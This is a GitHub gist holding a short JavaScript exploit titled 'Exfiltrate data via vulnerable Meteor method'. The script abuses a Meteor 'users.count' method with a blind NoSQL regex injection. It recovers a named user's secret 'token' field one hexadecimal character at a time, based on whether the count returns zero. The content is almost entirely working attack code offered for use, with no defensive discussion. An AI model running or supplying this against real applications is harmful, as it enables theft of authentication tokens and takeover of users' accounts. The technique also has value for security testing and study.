Skip to content

Instantly share code, notes, and snippets.

@ojasookert

ojasookert/meteor-regex-blind-nosql.js

Created August 2, 2019 14:14
Show Gist options
  • Star 4 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ojasookert/47151d86cb0d7a384694cb6e52c51a59 to your computer and use it in GitHub Desktop.
Save ojasookert/47151d86cb0d7a384694cb6e52c51a59 to your computer and use it in GitHub Desktop.
Download ZIP
Exfiltrate data via vulnerable Meteor method
Raw
meteor-regex-blind-nosql.js
(function exploit(user, field, alphabet, data = '', index = 0) {
Meteor.call('users.count', {username: user, [field] : {$regex: '^' + data + alphabet[index] + '.*'}}, (err, res) => {
console.log('^' + data + alphabet[index] + '.*', res);
if (res == 0) {
index++;
} else {
data += alphabet[index];
index = 0;
}
if (index >= alphabet.length) {
console.log("Done", data);
return;
}
setTimeout(() => {
exploit(user, field, alphabet, data, index);
});
});
})('kertojasoo', 'token', '0123456789abcdef'.split(''));
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment